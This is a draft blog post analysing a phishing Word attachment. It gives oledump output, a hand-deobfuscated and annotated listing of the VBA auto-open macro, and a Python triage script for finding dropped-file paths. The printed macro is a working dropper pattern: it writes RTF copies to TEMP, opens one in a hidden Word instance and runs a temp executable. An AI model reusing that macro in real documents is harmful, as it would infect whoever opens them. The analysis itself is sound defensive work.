Secure DOC Email Malware
draft post, needs more links and images
I spent a few pleasant hours today puzzling over a malware sample I received in email this week. Attached to a message from a bank I don’t do any business with was a Word document whose contents proclaim it holds an important secret message that can only be seen if macros are enabled. I was hooked, for the malware undoubtedly within!
Along the way I found out about and devoured a video workshop from Didier Stevens, who makes the tools I was using. So, allow me to plug his firm DSL and the first malicious documents workshop.
ETA 16 Nov: Lots of very smart people did analysis on other samples from this campaign. I read some really good stuff about it later on a closed list, and these are public:
- https://www.proofpoint.com/us/dyre-malware-campaigners-innovate-distribution-techniques
- http://phishme.com/macro-documents-with-xor-encoded-payloads/
Background
DSL’s oledump tool was very helpful in digging into the file. In fact I was fighting with the random variable names of the macro code for a while before I thought to hash and look up my sample. Here are those links:
The VirusTotal detection rate is pretty good now. I got my sample in the mail on Wednesday 21 Oct. VT analysis
The public Cuckoo Sandbox instance at Malwr has some good details, including some dropped-files info in its results.
This MyOnlineSecurity post describes the campaign and related risks, and includes some screenshots of the doc as opened in MS Office.
surface
$ ls -lh Secure\ Message.doc
-rw-r--r-- 1 adric adric 73K Oct 21 13:08 Secure Message.doc
$ md5sum Secure\ Message.doc
e801337581de7c8b4e887a3f8f0944b3 Secure Message.doc
$ file Secure\ Message.doc
Secure Message.doc: Composite Document File V2 Document, Little Endian,
Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm,
Revision Number: 1, Name of Creating Application: Microsoft Office Word,
Create Time/Date: Wed Oct 21 21:12:00 2015, Last Saved Time/Date:
Wed Oct 21 17:23:00 2015, Number of Pages: 1, Number of Words: 535,
Number of Characters: 3051, Security: 0
$ gstat Secure\ Message.doc
File: ‘Secure Message.doc’
Size: 74752 Blocks: 152 IO Block: 4096 regular file
Device: 1000002h/16777218d Inode: 94755058 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 502/ adric) Gid: ( 20/ staff)
Access: 2015-10-23 19:25:30.000000000 -0400
Modify: 2015-10-21 13:08:31.000000000 -0400
Change: 2015-10-21 13:08:31.000000000 -0400
Birth: 2015-10-21 13:08:31.000000000 -0400
I did throw the sample at my local Cuckoo instance here in the home lab, but my victim virtual machine(s) don’t have winword (MS Office) so they couldn’t do anything with it.
oledump it
DSL tools are available from Didier’s [website](http://blog.didierstevens.com/), are included in REMnux, and come with the workshop as well.
A basic run of the tool shows the sections of the Office file and calls out the macros for us with an M for functional macro code:
$ /opt/remnux-didier/oledump.py Secure\ Message.doc
1: 121 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 9365 '1Table'
5: 4096 'Data'
6: 440 'Macros/PROJECT'
7: 41 'Macros/PROJECTwm'
8: M 4797 'Macros/VBA/ThisDocument'
9: 2765 'Macros/VBA/_VBA_PROJECT'
10: 515 'Macros/VBA/dir'
11: 205 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Item'
12: 341 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Properties'
13: 37482 'WordDocument'
We can isolate, decompress and export a stream like so:
/opt/remnux-didier/oledump.py -s 8 -v "Secure Message.doc" > macro
This macro is obfuscated in a couple of ways, including all of the variable and function names being noisy goo, and some use of extra variables and concatenation. Here are a few lines, slightly altered as an example:
Sub AutoOpen()
    YQGDJHASDB = "q,jwdlk XXXXXXXXXXX jkgasjkdhwqdasd"
    Auto_Open
End Sub
Sub Ljqhdsd()
    KAHDJKASND = "askdhjk ashdjk asghXXXXXXXXXXXX"
    Subipose
End Sub
I fussed over the code of this macro for quite a while renaming things to make some sense of it. Here’s my version (annotations are VBA comments, so this still pastes into the VBA editor):
' main for Word
Sub AutoOpen()
    varY = "q,jwdlk XXXXXXXXXXXXXXXX jkgasjkdhwqdasd"
    Auto_Open    ' run main for Excel
End Sub

' orphan?
Sub LK()
    varK = "askdhjk ashdjk asghXXXXXXXXXXXX"
    main
End Sub

Sub main()
    slash = "\"
    Temp = "TEMP"
    On Error Resume Next
    TMP = Environ$(Temp) & slash
    FEFE = ".e"
    FEFE = FEFE & "xe"
    DEDE = "." + "rt" + "f"
    TCA = TMP + "322" + DEDE    ' $TEMP\322.rtf
    TCB = TMP + "311" + DEDE    ' $TEMP\311.rtf
    TEX = TMP + "w18" & "" + FEFE    ' $TEMP\w18.exe
    ' save RTFs to disk
    SaveFile (TCA)
    SaveFile (TCB)
    ' sleep?
    Sleep (2)
    ' Run Word: create another Word window with 322.rtf, hide it
    Set wordObj = CreateObject("Word.Application")
    wordObj.Visible = False
    Set frame = wordObj.Documents.Open(TCA)
    ' sleep and then exec
    Sleep (2)
    Shell (TEX)    ' run $Temp\w18.exe
    Sleep (1)
    ' stop other Word
    wordObj.Quit
    Set wordObj = Nothing    ' kill Word
End Sub

' for Excel
Sub Workbook_Open()
    varX = "ansdh XXXXXXXXXXXXXXXX d"
    main
End Sub

' Sleep == sleep(secs)?  busy-waits on the Timer instead of calling the Win32 API
Sub Sleep(duration As Long)
    Dim Counter As Long
    Counter = Timer + duration
    Do While Timer < Counter
        DoEvents
    Loop
End Sub

' Save File As RTF?
Public Function SaveFile(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function

' main for Excel
Sub Auto_Open()
    main
    varB = "qkwdhj XXXXXXXXXXXXXXXXd"
End Sub
What I think it does: when the document is opened in Word or Excel it auto-executes the main function to save the document to disk into temp files, using Word to convert to RTF, twice ($TEMP\322.rtf, $TEMP\311.rtf). Another hidden Word window is opened on one of those files ($TEMP\322.rtf) and used to execute a third file ($TEMP\w18.exe).
Checking back with the dynamic analysis from Malwr we see the 311 and 322 files drop, along with some other possible dropped files. 311 and 322 are slightly different sizes, but ten times larger than our specimen at 771826 and 771821 bytes. A third large file in Malwr is office.odf, which is ~2.3 MB. VirusTotal for that indicates that it is a signed part of MS Office (“Microsoft Office culture data dll”), so that may be an artifact of the sandbox that isn’t relevant to the malware activity.
I think Malwr’s system wasn’t vulnerable so they didn’t get the payload. My hypothesis is that something in the Office doc can exploit Word when it is written out as RTF and then read back in.
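The renaming above was done by hand; the same string-building trick (extensions split across ".e" & "xe", paths assembled from Environ$ plus literals) can be folded mechanically. This is an added triage script, not part of the post or of DSL's tools: it scans a macro dump for auto-exec entry points, risky calls and resolved file names. The MACRO text is a constructed excerpt using the post's renamed variables, and "%TEMP%" is a placeholder for the Environ$ value that cannot be known offline.

```python
import re

# Constructed excerpt of the renamed macro (not the sample's own identifiers).
MACRO = r'''
Sub AutoOpen()
    main
End Sub
Sub main()
    slash = "\"
    TMP = Environ$("TEMP") & slash
    FEFE = ".e"
    FEFE = FEFE & "xe"
    DEDE = "." + "rt" + "f"
    TCA = TMP + "322" + DEDE
    TCB = TMP + "311" + DEDE
    TEX = TMP + "w18" & "" + FEFE
    Set wordObj = CreateObject("Word.Application")
    Shell (TEX)
End Sub
'''
AUTOEXEC = ("AutoOpen", "Auto_Open", "Workbook_Open", "Document_Open")
SUSPICIOUS = ("Environ$", "CreateObject", "Shell")

def resolve_strings(src):
    """Fold straight-line string assignments made of literals, earlier string
    variables and the & / + operators, as the macro builds its file names.
    Environ$(...) is unknown offline, so it becomes the placeholder "%TEMP%"."""
    env, assign = {}, re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
    for line in src.splitlines():
        m = assign.match(line)
        if not m:
            continue  # not a plain 'name = expr' line (Set, calls, etc.)
        name, expr = m.groups()
        expr = re.sub(r'Environ\$\((\w+|"[^"]*")\)', '"%TEMP%"', expr)
        parts = re.split(r'\s*[&+]\s*', expr)  # literals here contain no & or +
        if all(p[:1] == p[-1:] == '"' or p in env for p in parts):
            env[name] = "".join(p[1:-1] if p[:1] == '"' else env[p] for p in parts)
    return env

def triage(src):
    """Auto-exec subs, risky calls, the Shell target and dropped-file paths."""
    strings = resolve_strings(src)
    autoexec = [s for s in AUTOEXEC
                if re.search(r'\bSub\s+' + re.escape(s) + r'\b', src, re.I)]
    calls = [s for s in SUSPICIOUS if s in src]
    shell = [strings.get(v, v) for v in re.findall(r'\bShell\s*\(\s*(\w+)', src)]
    files = sorted(v for v in strings.values()
                   if "\\" in v and v.lower().endswith((".exe", ".rtf")))
    return {"autoexec": autoexec, "calls": calls, "shell": shell, "files": files}
```

Feed it the output of `oledump.py -s 8 -v` and the resolved paths give you the file names to hunt for in %TEMP% on a suspected host.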
content
The Word DOC contents include a note about an encrypted message (“A message is encrypted by RSA key.”) and an impressive-looking block of noise marked as RSA encrypted and delimited by “—–RSA PROTECTED BLOCK—–” markers.
I pulled out the data block with oledump and trimmed with vi:
/opt/remnux-didier/oledump.py -s13 --cut '0x900:0x15c0' -d Secure\ Message.doc > q; vi q
I can’t make anything out of it yet, despite trying a few basic decoding tricks. It’s pretty random, according to chi-squared analysis with DensityScout (in REMnux):
$ densityscout -m CHI q
DensityScout (Build 43)
by Christian Wojner
Calculating density for file ...
(Density) | Filename
--------------------------------------------------------------
(42.4244) | q
Maybe it really is encrypted, with an RSA cipher, and some of the noise in the macro is key material?